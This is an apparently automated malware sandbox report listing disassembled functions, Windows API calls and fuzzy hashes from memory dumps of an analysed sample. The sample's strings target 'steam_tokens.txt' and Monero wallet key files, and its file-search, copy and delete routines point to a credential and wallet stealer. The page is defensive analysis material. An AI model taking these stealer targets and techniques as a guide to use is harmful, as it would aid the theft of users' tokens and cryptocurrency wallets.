Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 78b71ddfd98939609d50a4ae979f5d579f40c44fec91843f91061d7474bd10c2
Instruction ID: 7011f894ab55bce7202f8c0028099deb24be7a67aa8334269f7acbda05b41ca3
Opcode Fuzzy Hash: 78b71ddfd98939609d50a4ae979f5d579f40c44fec91843f91061d7474bd10c2
Instruction Fuzzy Hash: EEF0197192010866CF14FBB4EC979ED73BCAB55300F4042B8B816624A2EF246A09C7E6

Function 00B97ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00BA0E2C), ref: 00B97F00
wsprintfA.USER32 ref: 00B97F16

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 6d45d13d306ce4ef3206ee3c996d9881d2537e19003e8293ec95ff93962dc012
Instruction ID: 813e7067affea922caa9da8304411bb384692bb7cdd6d44f9b0674ed4ee653f6
Opcode Fuzzy Hash: 6d45d13d306ce4ef3206ee3c996d9881d2537e19003e8293ec95ff93962dc012
Instruction Fuzzy Hash: 48F096B1944608EBCB10DF89DC45FAAF7BCF744714F0006A9F515D2280D77559048BE1

Function 00B8B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

lstrlen.KERNEL32(00000000), ref: 00B8B9C2
lstrlen.KERNEL32(00000000), ref: 00B8B9D6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: d1b9c27a269363d50f701e8ebcae4994de96989bc4dd0688fac01f696df30a87
Instruction ID: e82f42b4a2f910e6a4591195641eea6eaee829aae52c29baf8712c3241e5b64e
Opcode Fuzzy Hash: d1b9c27a269363d50f701e8ebcae4994de96989bc4dd0688fac01f696df30a87
Instruction Fuzzy Hash: BEE1DF729201199BDF05FBA4DC92DEE73B8BF54300F4045A9F506B61A1EF346A49CBA2

Function 00B8AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

lstrlen.KERNEL32(00000000), ref: 00B8B16A
lstrlen.KERNEL32(00000000), ref: 00B8B17E

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: ca88f759b98bbffbedf5e75a2146ffec00e48720f8e3914b13765056d1bb03d5
Instruction ID: 6862771a3ca0bd9d3eea5dc2603351f50655c4c6c1af72ee33fcd576f710b8d9
Opcode Fuzzy Hash: ca88f759b98bbffbedf5e75a2146ffec00e48720f8e3914b13765056d1bb03d5
Instruction Fuzzy Hash: 6491EC729201199BDF04FBA4DC96DEE73B8AF54300F4045A9F506B61A1EF346A09CBA2

Function 00B8B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

lstrlen.KERNEL32(00000000), ref: 00B8B42E
lstrlen.KERNEL32(00000000), ref: 00B8B442

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: d376a0d22e89e80b2a77c6fb7fd23ab1842a68af739fef72391f0bdc059f4818
Instruction ID: 21086b83926bbad13d0e94d130d84698ebe73dc7d94ef5a05cb27871e7a4f859
Opcode Fuzzy Hash: d376a0d22e89e80b2a77c6fb7fd23ab1842a68af739fef72391f0bdc059f4818
Instruction Fuzzy Hash: DA711E719201199BDF04FBA4DC96DEE73B8BF54304F4045B8F506A61A1EF346A09CBE2

Function 00B94BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

lstrcat.KERNEL32(?,00000000), ref: 00B94BEA
lstrcat.KERNEL32(?,0133D760), ref: 00B94C08

Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B9492C
Part of subcall function 00B94910: FindFirstFileA.KERNEL32(?,?), ref: 00B94943

Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA0FDC), ref: 00B94971
Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA0FE0), ref: 00B94987
Part of subcall function 00B94910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B94B7D
Part of subcall function 00B94910: FindClose.KERNEL32(000000FF), ref: 00B94B92

Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B949B0
Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA08D2), ref: 00B949C5
Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B949E2
Part of subcall function 00B94910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B94A1E
Part of subcall function 00B94910: lstrcat.KERNEL32(?,0133E8F8), ref: 00B94A4A
Part of subcall function 00B94910: lstrcat.KERNEL32(?,00BA0FF8), ref: 00B94A5C
Part of subcall function 00B94910: lstrcat.KERNEL32(?,?), ref: 00B94A70
Part of subcall function 00B94910: lstrcat.KERNEL32(?,00BA0FFC), ref: 00B94A82
Part of subcall function 00B94910: lstrcat.KERNEL32(?,?), ref: 00B94A96
Part of subcall function 00B94910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B94AAC
Part of subcall function 00B94910: DeleteFileA.KERNEL32(?), ref: 00B94B31

Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B94A07

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: a8032df6fa8220fd4ffee50ddc93affa07a1817d93deace29de7f4b8130fea0a
Instruction ID: 1369a7810090b7d72a9c2c5e14f22562ec51310e765385bb3f4812ee2ee66ad7
Opcode Fuzzy Hash: a8032df6fa8220fd4ffee50ddc93affa07a1817d93deace29de7f4b8130fea0a
Instruction Fuzzy Hash: DE412C775002096BCB54FBA4FC42DEE33BCA799300F008598B549D7292ED755B888BF2

Function 00B86660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00B86706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00B86753

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4a3d3e53de480882e198ab76e62ef8a59df2cc6081b5ea9d95750fabb3e49a8d
Instruction ID: a190c698ba0439859e08ca7b6cacc44d820b680990158c394ae7932bf4917898
Opcode Fuzzy Hash: 4a3d3e53de480882e198ab76e62ef8a59df2cc6081b5ea9d95750fabb3e49a8d
Instruction Fuzzy Hash: EA419574A00209EFCB44DF98C494BADBBB1FF48314F2486A9E9599B355D731AA81CB84

Function 00B95050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

lstrcat.KERNEL32(?,00000000), ref: 00B9508A
lstrcat.KERNEL32(?,0133E508), ref: 00B950A8

Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B9492C
Part of subcall function 00B94910: FindFirstFileA.KERNEL32(?,?), ref: 00B94943

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: d3702b1458b3045a3554daf737b170d4190044814eba6fada05c6b6d6e0a7262
